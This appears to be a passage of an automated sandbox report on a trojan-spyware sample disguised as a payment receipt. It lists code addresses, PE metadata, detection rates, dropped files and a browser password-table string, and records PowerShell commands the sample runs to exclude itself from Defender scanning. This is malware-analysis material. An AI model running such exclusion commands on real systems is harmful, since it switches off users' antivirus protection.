                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_010E0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01178158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011BB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0112516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_010DF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011B01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_010FB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011A81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_010F70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0119F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011A70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011AF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011A132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_010DD34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011AA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0113739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011B03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_010FE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01190274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_010F52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0110B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011702C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011912ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F05359_2_010F0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A75719_2_011A7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B05919_2_011B0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118D5B09_2_0118D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AF43F9_2_011AF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A24469_2_011A2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E14609_2_010E1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119E4F69_2_0119E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011147509_2_01114750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F07709_2_010F0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AF7B09_2_011AF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EC7C09_2_010EC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A16CC9_2_011A16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110C6E09_2_0110C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110B9509_2_0110B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F99509_2_010F9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011069629_2_01106962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F29A09_2_010F29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011BA9A69_2_011BA9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D8009_2_0115D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F28409_2_010F2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FA8409_2_010FA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D68B89_2_010D68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E8F09_2_0111E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F38E09_2_010F38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AAB409_2_011AAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFB769_2_011AFB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110FB809_2_0110FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A6BD79_2_011A6BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01165BF09_2_01165BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0112DBF99_2_0112DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFA499_2_011AFA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A7A469_2_011A7A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01163A6C9_2_01163A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EEA809_2_010EEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01135AA09_2_01135AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0118DAAC9_2_0118DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119DAC69_2_0119DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FAD009_2_010FAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A1D5A9_2_011A1D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F3D409_2_010F3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011A7D739_2_011A7D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01108DBF9_2_01108DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110FDC09_2_0110FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EADE09_2_010EADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0C009_2_010F0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01169C329_2_01169C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01190CB59_2_01190CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFCF29_2_011AFCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E0CF29_2_010E0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFF099_2_011AFF09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01110F309_2_01110F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01132F289_2_01132F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01164F409_2_01164F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F1F929_2_010F1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AFFB19_2_011AFFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0116EFA09_2_0116EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E2FC89_2_010E2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010FCFE09_2_010FCFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AEE269_2_011AEE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F0E599_2_010F0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01102E909_2_01102E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011ACE939_2_011ACE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010F9EB09_2_010F9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011AEEDB9_2_011AEEDB
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_02DA421010_2_02DA4210
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_02DA6F9010_2_02DA6F90
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_02DADE7410_2_02DADE74
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730678810_2_07306788
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730635010_2_07306350
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_073083D810_2_073083D8
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_073083CA10_2_073083CA
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0730B07E10_2_0730B07E
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07305F1110_2_07305F11
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07305F1810_2_07305F18
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07307EB810_2_07307EB8
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07307EC810_2_07307EC8
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07506F5010_2_07506F50
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_07505F6010_2_07505F60
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 10_2_0750EA4310_2_0750EA43
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F010015_2_010F0100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0114600015_2_01146000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011802C015_2_011802C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110053515_2_01100535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112475015_2_01124750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110077015_2_01100770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010FC7C015_2_010FC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111C6E015_2_0111C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111696215_2_01116962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011029A015_2_011029A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110A84015_2_0110A840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110284015_2_01102840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113889015_2_01138890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010E68B815_2_010E68B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0112E8F015_2_0112E8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010FEA8015_2_010FEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110AD0015_2_0110AD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110ED7A15_2_0110ED7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01118DBF15_2_01118DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01108DC015_2_01108DC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010FADE015_2_010FADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01100C0015_2_01100C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F0CF215_2_010F0CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01120F3015_2_01120F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01142F2815_2_01142F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01174F4015_2_01174F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0117EFA015_2_0117EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F2FC815_2_010F2FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01100E5915_2_01100E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01112E9015_2_01112E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010EF17215_2_010EF172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113516C15_2_0113516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110B1B015_2_0110B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010ED34C15_2_010ED34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011033F315_2_011033F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011052A015_2_011052A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111B2C015_2_0111B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111D2F015_2_0111D2F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_010F146015_2_010F1460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110349715_2_01103497
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011474E015_2_011474E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110B73015_2_0110B730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110995015_2_01109950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111B95015_2_0111B950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0110599015_2_01105990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0116D80015_2_0116D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_011038E015_2_011038E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111FB8015_2_0111FB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01175BF015_2_01175BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0113DBF915_2_0113DBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01173A6C15_2_01173A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01103D4015_2_01103D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0111FDC015_2_0111FDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01179C3215_2_01179C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01119C2015_2_01119C20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01101F9215_2_01101F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01109EB015_2_01109EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0042EEF315_2_0042EEF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01125130 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01147E54 appears 97 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0116EA12 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0116F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 010DB970 appears 268 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 01137E54 appears 96 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0115EA12 appears 86 times
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: invalid certificate
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2128885963.0000000007260000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2105060021.000000000103E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000000.2031141086.0000000000A44000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamedLtX.exe: vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2129691124.00000000072E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2121814935.0000000003D9B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe | Binary or memory string: OriginalFilenamedLtX.exe: vs PAYMENT RECEIPT_USD21,000.exe
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: fttQgpyzkkc.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, l7Cdp1x36yCles9PKB.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, GikDqR6g4UGrEltCUX.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.72e0000.4.raw.unpack, GikDqR6g4UGrEltCUX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, GikDqR6g4UGrEltCUX.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, GikDqR6g4UGrEltCUX.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PAYMENT RECEIPT_USD21,000.exe.3faf1c0.1.raw.unpack, l7Cdp1x36yCles9PKB.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/16@15/9
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | File created: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2516:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Mutant created: \Sessions\1\BaseNamedObjects\PwlChGsSWOKVlCIsnundQHs
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | File created: C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp
                Source: PAYMENT RECEIPT_USD21,000.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PAYMENT RECEIPT_USD21,000.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000000.2030935576.0000000000962000.00000002.00000001.01000000.00000003.sdmp, fttQgpyzkkc.exe.0.dr | Binary or memory string: INSERT INTO [dbo].[Table] ([Id], [Nume], [Grupa_muschi], [Data_livrare], [Pret]) VALUES (@Id, @Nume, @Grupa_muschi, @Data_livrare, @Pret);
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000000.2030935576.0000000000962000.00000002.00000001.01000000.00000003.sdmp, fttQgpyzkkc.exe.0.dr | Binary or memory string: UPDATE [dbo].[Table] SET [Id] = @Id, [Nume] = @Nume, [Grupa_muschi] = @Grupa_muschi, [Data_livrare] = @Data_livrare, [Pret] = @Pret WHERE (([Id] = @Original_Id) AND ([Nume] = @Original_Nume) AND ([Grupa_muschi] = @Original_Grupa_muschi) AND ([Data_livrare] = @Original_Data_livrare) AND ([Pret] = @Original_Pret));
                Source: wlanext.exe, 00000011.00000003.2462226374.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2459785986.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2459674007.0000000003492000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.00000000034DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PAYMENT RECEIPT_USD21,000.exe | ReversingLabs: Detection: 36%
                Source: PAYMENT RECEIPT_USD21,000.exe | Virustotal: Detection: 44%
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | File read: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe
                Source: unknown | Process created: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
